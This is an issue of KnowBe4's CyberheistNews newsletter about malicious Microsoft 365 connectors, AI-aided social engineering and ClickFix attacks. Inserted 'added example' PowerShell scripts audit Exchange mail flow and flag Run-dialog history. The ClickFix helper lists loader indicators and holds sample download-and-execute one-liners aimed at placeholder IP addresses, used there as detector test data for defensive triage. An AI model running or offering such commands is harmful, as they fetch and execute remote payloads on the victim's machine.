CyberheistNews Vol 15 #31 [Heads Up] Malicious M365 Connectors Put 300M Accounts at Risk



Cyberheist News


CyberheistNews Vol 15 #31  |   August 5th, 2025


[Heads Up] Malicious M365 Connectors Put 300M Accounts at Risk

Roger Grimes wrote an important blog post that immediately went viral. Here is a short summary, but I strongly recommend you read the whole blog post and defend against these malicious connectors!

There’s a growing threat targeting Microsoft 365 users (over 300 million of them, to be exact) and it’s flying under the radar. Bad actors are abusing malicious Exchange Connectors, rogue Outlook rules and custom forms to hijack email flows, wipe logs, reroute messages and sneak in backdoors for long-term access.

How do they get in? Simple: stolen credentials. Usually scooped up through phishing or social engineering. Once they’ve got access, attackers set up these connectors in a way that blends right in with legitimate configurations, making them tough to spot—especially in cloud environments like M365, not just old-school on-prem Exchange.

Microsoft recently updated their documentation acknowledging a spike in these attacks. One case involved a small business owner who got phished. A rogue connector labeled “games” was quietly created and used to reroute invoice payments—costing the company big.
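Added example, not code from Roger's blog post or from Microsoft's documentation: a PowerShell audit of the places these backdoors live in Exchange Online, so you can look for them in your own tenant before reading the full write-up. It assumes the ExchangeOnlineManagement module, an account with Exchange Administrator (or Global Reader) rights, a 30-day lookback window and an output folder under $env:TEMP; all four are assumptions you can change. It covers connectors, mail flow (transport) rules, per-mailbox inbox rules, mailbox-level forwarding and the unified audit log entries that show who made each change. Outlook custom forms are not exposed by these cmdlets and are not covered here.

```powershell
# Added example (not from the KnowBe4 blog post or Microsoft docs): audit Exchange Online
# for the persistence mechanisms described above. Assumptions: ExchangeOnlineManagement
# module installed, an Exchange Admin / Global Reader account, 30-day lookback, $env:TEMP output.
Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline -ShowBanner:$false

$since  = (Get-Date).AddDays(-30)
$outDir = Join-Path $env:TEMP 'm365-mailflow-audit'
New-Item -ItemType Directory -Path $outDir -Force | Out-Null

# 1. Every connector, with creation/change times. Rogue connectors get innocuous
#    names ("games" in the incident above), so review all of them, not just odd-looking ones.
$inbound  = Get-InboundConnector  | Select-Object Name, Enabled, ConnectorType, SenderDomains, SenderIPAddresses, WhenCreated, WhenChanged
$outbound = Get-OutboundConnector | Select-Object Name, Enabled, ConnectorType, RecipientDomains, SmartHosts, WhenCreated, WhenChanged
$inbound  | Export-Csv (Join-Path $outDir 'inbound-connectors.csv')  -NoTypeInformation
$outbound | Export-Csv (Join-Path $outDir 'outbound-connectors.csv') -NoTypeInformation

# Flag connectors touched inside the lookback window, and outbound connectors that
# route mail to a smart host (the classic way to siphon a copy of outbound mail).
$inbound | Where-Object { $_.WhenCreated -ge $since -or $_.WhenChanged -ge $since } |
    ForEach-Object { Write-Warning "Recent inbound connector: $($_.Name) (changed $($_.WhenChanged))" }
$outbound | Where-Object { $_.SmartHosts } |
    ForEach-Object { Write-Warning "Outbound connector $($_.Name) routes via smart host(s): $($_.SmartHosts -join ', ')" }

# 2. Mail flow (transport) rules that redirect, copy or drop messages tenant-wide.
Get-TransportRule | Where-Object {
    $_.RedirectMessageTo -or $_.BlindCopyTo -or $_.CopyTo -or $_.DeleteMessage
} | Select-Object Name, State, RedirectMessageTo, BlindCopyTo, CopyTo, DeleteMessage, WhenChanged |
    Export-Csv (Join-Path $outDir 'transport-rules-forwarding.csv') -NoTypeInformation

# 3. Inbox rules in every mailbox that forward, redirect, delete or bury mail
#    (BEC tradecraft: keep the real recipient from seeing the vendor's replies).
$suspiciousRules = foreach ($mbx in Get-Mailbox -ResultSize Unlimited) {
    Get-InboxRule -Mailbox $mbx.PrimarySmtpAddress -ErrorAction SilentlyContinue |
        Where-Object {
            $_.ForwardTo -or $_.ForwardAsAttachmentTo -or $_.RedirectTo -or
            $_.DeleteMessage -or ($_.MoveToFolder -match 'RSS|Archive|Deleted')
        } |
        Select-Object @{n='Mailbox';e={$mbx.PrimarySmtpAddress}}, Name, Enabled,
                      ForwardTo, ForwardAsAttachmentTo, RedirectTo, DeleteMessage, MoveToFolder
}
$suspiciousRules | Export-Csv (Join-Path $outDir 'inbox-rules-suspicious.csv') -NoTypeInformation

# 4. Forwarding configured on the mailbox object itself, outside of any inbox rule.
Get-Mailbox -ResultSize Unlimited |
    Where-Object { $_.ForwardingSmtpAddress -or $_.ForwardingAddress } |
    Select-Object PrimarySmtpAddress, ForwardingSmtpAddress, ForwardingAddress, DeliverToMailboxAndForward |
    Export-Csv (Join-Path $outDir 'mailbox-forwarding.csv') -NoTypeInformation

# 5. Who created or changed these objects: pull the relevant unified audit log operations.
Search-UnifiedAuditLog -StartDate $since -EndDate (Get-Date) -ResultSize 5000 -Operations @(
    'New-InboundConnector', 'Set-InboundConnector', 'New-OutboundConnector', 'Set-OutboundConnector',
    'New-TransportRule', 'Set-TransportRule', 'New-InboxRule', 'Set-InboxRule', 'Set-Mailbox'
) | Select-Object CreationDate, UserIds, Operations, AuditData |
    Export-Csv (Join-Path $outDir 'audit-log-mailflow-changes.csv') -NoTypeInformation

Write-Host "Reports written to $outDir"
Disconnect-ExchangeOnline -Confirm:$false
```

Run it from an admin workstation and read the CSVs with the audit log open beside them: a connector or rule that a phished user's account created, at an odd hour, is the pattern to look for. Step 5 only works if unified audit logging is enabled for the tenant, and the 5000-record cap means a busy tenant needs a shorter window or a narrower operation list.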

Read the blog post and find out what you can do to fight back!

Blog post with links:
https://blog.knowbe4.com/malicious-connectors-potentially-impact-hundreds-of-millions-of-microsoft-365-users

[Live Demo] Ridiculously Easy AI-Powered Security Awareness Training and Phishing

Phishing and social engineering remain the #1 cyber threat to your organization, with 68% of data breaches caused by human error. Your security team needs an easy way to deliver personalized training—this is precisely what our AI Defense Agents provide.

Join us for a demo showcasing KnowBe4’s leading-edge approach to human risk management with agentic AI that delivers personalized, relevant and adaptive security awareness training with minimal admin effort.

See how easy it is to train and phish your users with KnowBe4’s HRM+ platform:

  • SmartRisk Agent™ – Generate actionable data and metrics to help you lower your organization’s human risk score
  • Template Generator Agent – Create convincing phishing simulations, including Callback Phishing, that mimic real threats. The Recommended Landing Pages Agent then suggests appropriate landing pages based on AI-generated templates
  • Automated Training Agent – Automatically identify high-risk users and assign personalized training
  • Knowledge Refresher Agent and Policy Quizzes Agent – Reinforce your security program and organizational policies.
  • Enhanced Executive Reports – Track user activities, visualize trends, download widgets, and improve searching/sorting to provide deeper insights and streamline collaboration

See how these powerful AI-driven features work together to dramatically reduce your organization’s risk while saving your team valuable time.

Date/Time: TOMORROW, Wednesday, August 6 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/kmsat-demo-2?partnerref=CHN2

[A Present] Best Security Practices for AI Prompting and Building Agents [PDF]

As KnowBe4’s new Executive Chair I was asked to “live two years in the future” and do as much research on AI as I could, to guide KnowBe4 even further in the AI future. I have immersed myself in some exciting research projects that I will tell you more about, but in the meantime, I have a little present I wanted to share with you now.

Bob Fabien wrote on X: “While some are still paying over a grand for AI courses, the biggest players are giving away high-value resources at no cost. From prompt engineering to agent frameworks, it is all here.”

I grabbed the new Agent Mode of OpenAI and told it to create an executive summary of the best practices in all these guides and documents. Then I ran an edit over it for readability and completeness.

I also included a case study: Building a Cybersecurity Incident Classifier.

Hoping this saves you a bunch of time. Here it is as a 21-page PDF, great for your next lunch and learn. Enjoy! [No registration required]
https://blog.knowbe4.com/new-whitepaper-best-security-practices-for-ai-prompting-and-building-agent-systems

Beyond DMARC: Closing Critical Gaps in Your Email Security Shield

Think your email is safe because you’ve implemented DMARC? Think again. While DMARC, SPF and DKIM are essential standards for preventing domain spoofing, sophisticated attackers are exploiting hidden vulnerabilities that these protocols alone can’t address. The result? Dangerous phishing emails are still landing in your users’ inboxes, even when you think you’ve done everything right.

Join Roger Grimes, KnowBe4’s Data-Driven Defense Evangelist, as he exposes the critical gaps in standard email authentication protocols and demonstrates how to build a truly comprehensive email security strategy combining proper DMARC implementation with advanced cloud email security.

You’ll discover:

  • Step-by-step guidance to properly implement DMARC, SPF and DKIM to maximize their effectiveness
  • The six sophisticated techniques cybercriminals are using right now to bypass standard email authentication
  • The common DMARC setup mistakes that are leaving your organization vulnerable without you realizing it
  • How cloud email security works alongside DMARC to create an impenetrable defense
  • Why security awareness training remains your critical last line of defense and how to optimize it

Don’t let a false sense of security leave your organization exposed. Learn how to build a truly comprehensive email security strategy that combines technical controls with human vigilance, and earn CPE credit for attending!

Date/Time: Wednesday, August 13 @ 2:00 PM (ET)

Can’t attend live? No worries — register now and you will receive a link to view the presentation on-demand afterwards.

Save My Spot:
https://info.knowbe4.com/dmarc-webinar-2025?partnerref=CHN

[FINALLY!] Integrate SecurityCoach with Microsoft Edge for Business

Managing the security gap between your technical defenses and user behavior just got easier. KnowBe4 SecurityCoach for Microsoft Edge for Business integration has been released. As one of the only human risk management platforms with a native reporting connector in Microsoft Edge for Business, SecurityCoach now transforms your user’s browser into your real-time coaching platform.

It delivers immediate guidance when users engage in risky browser behavior, such as visiting suspicious websites, reusing passwords or attempting to bypass security warnings.

You may not know this, but Microsoft Edge is by far the leading browser in Enterprise settings. It dominates the segment with adoption by 61% of corporate IT departments, largely due to its seamless integration with AD, M365 and the Windows ecosystems.

You should see it in action for yourself. Start here.

Blog post with links:
https://blog.knowbe4.com/boost-your-browsing-security-integrate-securitycoach-with-microsoft-edge-for-business

Your Guide to Preserving Information Barriers in Microsoft 365

Our research shows 66% of organizations have had their email information barriers breached, resulting in major consequences like disrupted operations, client churn and regulatory penalties.

A new approach to augment static data loss prevention (DLP) barriers is needed.

This guide reveals how intelligent email DLP enables firms to take a proactive approach to enforcing information barriers, preventing incidents before they happen.

A New Approach with Intelligent Email DLP

Discover how an intelligent DLP solution can help your organization:

  • Dynamically analyze emails and uphold barriers before data is sent
  • Leverage existing data classifications and group permissions automatically
  • Provide employees chances to self-correct mistakes in real-time

Download this whitepaper today to get insights into the limitations of static DLP rules, the benefits of intelligent email filtering and the competitive advantages gained through properly separating confidential data flows.

Download Now:
https://info.knowbe4.com/ciso-strategy-guide-preserving-email-information-barriers-micorsoft-365-chn

Let’s stay safe out there.

Warm regards,

Stu Sjouwerman, SACP
Executive Chairman
KnowBe4, Inc.

PS: [BUDGET AMMO] I’m a cybersecurity CEO who advises over 9,000 agencies and Sam Altman is wrong that the AI fraud crisis is coming—it’s already here:
https://fortune.com/2025/07/31/sam-altman-warning-ai-fraud-already-here-cybersecurity-lexisnexis-commentary/

PPS: [Black Hat 2025] Forecast: AI Mayhem, EV Intrusions, and Hacker Innovations. See you at 3pm at booth #1661 on the 6th!:
https://www.pcmag.com/news/black-hat-2025-forecast-ai-mayhem-ev-intrusions-hacker-innovations?


Quotes of the Week  

“Logic will get you from A to B. Imagination will take you everywhere.”
– Albert Einstein – Physicist (1879 – 1955)


“You have power over your mind – not outside events. Realize this, and you will find strength.”
– Marcus Aurelius – Roman Emperor (121 – 180 AD)


Thanks for reading CyberheistNews

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-31-heads-up-malicious-m365-connectors-put-300m-accounts-at-risk

Security News

AI-Powered Social Engineering Attacks Grow Even More Sophisticated

Social engineering remained the most common initial access vector in cyberattacks over the past year, according to a new report from Palo Alto Networks’ Unit 42.

Threat actors are increasingly using varied tactics to trick employees into granting them a foothold. “These attacks consistently bypassed technical controls by targeting human workflows, exploiting trust and manipulating identity systems,” Unit 42 says.

“More than one-third of social engineering incidents involved non-phishing techniques, including search engine optimization (SEO) poisoning, fake system prompts and help desk manipulation.”

Attackers are also refining their social engineering techniques, moving very quickly from initial access to lateral movement and privilege escalation. “Threat actors such as Muddled Libra bypass multi-factor authentication (MFA) and exploit IT support processes to escalate privileges in minutes, often without malware,” the researchers write.

“In one case, a threat actor moved from access to domain administrator in under 40 minutes using only built-in tools and social pretexts.” Notably, threat actors are using generative AI tools to craft extremely convincing, targeted phishing content.

Generative AI was “used to produce credible, human-like content across channels including email, voice and live chat,” Unit 42 says. “In multiple investigations, threat actors employed GenAI to craft highly personalized lures using public information.

Some campaigns went further, using cloned executive voices in callback scams to increase the plausibility of urgent phone requests. In more sustained intrusions AI was used to refine attacker personas, generate tailored phishing follow-ups and draft real-time responses.

These adaptive techniques allowed threat actors to maintain engagement across multiple stages of the intrusion, with a level of tone and timing that previously required a live operator.”

KnowBe4 empowers your workforce to make smarter security decisions every day.

Unit 42 has the story:
https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/

FBI Issues Guidance on Thwarting North Korea’s Fraudulent IT Schemes

The FBI has issued an advisory warning that North Korean IT workers continue to seek fraudulent employment at Western companies. These workers attempt to secure multiple remote jobs in order to generate revenue for Pyongyang, and in some cases use their access to steal data or deploy ransomware.

The individuals use social engineering techniques to trick employers into hiring them, then work with US-based facilitators to continue the ruse.

The advisory recommends that organizations carefully examine identity documents for misspellings or errors, and verify employment or education history by contacting former employers or schools directly.

The FBI also recommends in-person meetings to verify that a person isn’t lying about their identity. If a virtual meeting is necessary, the Bureau offers the following advice:

  • Mandate video and request that their backgrounds be unobscured.
  • Have the individual point the camera out a window and ask questions about their claimed current location and the location listed on their identification documents.
  • Ask the individual to wave their hand in front of their face as it may prompt a malfunction in AI generated video.

Additionally, the advisory notes, “Capture images for comparison with future meetings. Sometimes an individual is employed to pass the initial interview, but the on-the-job work is completed by a different individual.”

Additionally, organizations should ensure their contractors are aware of these techniques. “If your company employs contracted IT workers that have been hired by a third-party company, seek to educate the third-party company about this guidance,” the FBI says.

“Contract IT work is a common way that North Korean IT workers procure employment.” KnowBe4 security awareness training gives your organization an essential layer of defense against social engineering attacks.

The FBI has the story:
https://www.ic3.gov/PSA/2025/PSA250723-4

Social Engineering Attacks Surged in the First Half of 2025

Cybersecurity incidents nearly tripled in the first half of 2025, jumping from 6% in the second half of 2024 to 17% in the first half of 2025, according to a new report from LevelBlue.

Business email compromise (BEC) remains the most common method for initial access, but non-BEC tactics rose by 214%. The researchers observed a major surge in social engineering attacks, driven by the recent popularity of the ClickFix tactic.

“The LevelBlue Threat Trends Report found a massive uptick in social engineering attacks, accounting for 39% of initial access incidents observed during the first half of the year,” the researchers write. “This can be attributed to the increasing number of fake CAPTCHA social engineering attacks, especially ClickFix campaigns, which jumped 1,450% from the second half of 2024 to the first half of 2025.

These attacks leverage user trust and urgency to easily gain access to orgs’ networks.” ClickFix is a relatively new tactic that tricks users into running malicious commands on their computers.

“ClickFix lures users with fake system messages or alert pop-ups prompting them to ‘fix’ a purported issue by clicking a button or downloading a suspicious utility,” the researchers explain. “Fake CAPTCHA masquerades as a CAPTCHA verification page, prompting users to interact with keyboard input as part of a fake bot-detection challenge.

“These tactics create a false sense of legitimacy and cause the user to unintentionally execute attacker-controlled scripts.”
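Added example, not from the LevelBlue report: a PowerShell triage helper for the tactic just described. A ClickFix lure has the victim open the Run dialog and paste a command, and Windows records Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so that key is a cheap first place to look on a suspected endpoint. The indicator list, the two-hit threshold and the sample entries (including the IP addresses, which are from documentation ranges) are all constructed for illustration; on a live host you would feed Get-RunMruEntries into Test-ClickFixCommand instead of the sample list. HKCU only covers the user running the script, so for an offline image load the victim's NTUSER.DAT hive first.

```powershell
# Added example (not from the LevelBlue report): flag Run-dialog history entries that
# look like ClickFix payloads. Indicators, threshold and sample data are constructed.

function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$Command)
    # Substrings typical of a paste-and-run payload: a script host, a hidden window,
    # an encoded or downloaded stage, or a LOLBin used as a loader.
    $indicators = @(
        'powershell', 'pwsh', 'mshta', 'cmd /c', 'cmd.exe',
        '-enc', '-encodedcommand', '-w hidden', '-windowstyle hidden',
        'iwr ', 'invoke-webrequest', 'invoke-expression', 'iex', 'curl ',
        'http://', 'https://', 'frombase64string', 'bitsadmin', 'rundll32', 'regsvr32'
    )
    $lower = $Command.ToLowerInvariant()
    $hits  = @($indicators | Where-Object { $lower.Contains($_) })
    [pscustomobject]@{
        Command    = $Command
        Score      = $hits.Count
        Indicators = ($hits -join ', ')
        Suspicious = ($hits.Count -ge 2)   # two independent indicators = worth a look
    }
}

function Get-RunMruEntries {
    # Each RunMRU value (a, b, c, ...) holds one command with "\1" appended; MRUList gives the order.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $item = Get-ItemProperty -Path $key
    $item.PSObject.Properties |
        Where-Object { $_.Name -match '^[a-z]$' } |
        ForEach-Object { ([string]$_.Value) -replace '\\1$', '' }
}

# Constructed sample entries standing in for a captured RunMRU; swap in Get-RunMruEntries on a live host.
$sampleEntries = @(
    'notepad',
    'mstsc /v:fileserver01',
    'powershell -w hidden -c "iwr http://198.51.100.7/verify.txt | iex"  # I am not a robot',
    'mshta https://203.0.113.9/captcha.hta'
)

$results = foreach ($entry in $sampleEntries) { Test-ClickFixCommand -Command $entry }
$results | Where-Object Suspicious | Format-Table Score, Indicators, Command -AutoSize
```

The first two entries score zero; the PowerShell one-liner trips five indicators and the mshta entry two. The trailing "I am not a robot" text is the tell worth teaching users about: lures append it so the pasted line looks like a verification step rather than a command.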

LevelBlue also warns that AI is increasing attackers’ efficiency and speeding up cyberattacks. KnowBe4 security awareness training provides an essential layer of defense against these incidents.

“What’s especially concerning is how fast attackers are moving,” the report says. “Breakout times are shrinking, and threat actors are moving laterally faster than ever. It’s a clear sign that attackers are getting more efficient and more dangerous.

This is why it’s critical for security teams to double down on cyber education and awareness training. If your training hasn’t covered the latest social engineering tricks, now’s the time to review and update it.

LevelBlue has the story:
https://levelblue.com/newsroom/press-releases/levelblue-threat-trends-report-edition-two-2025
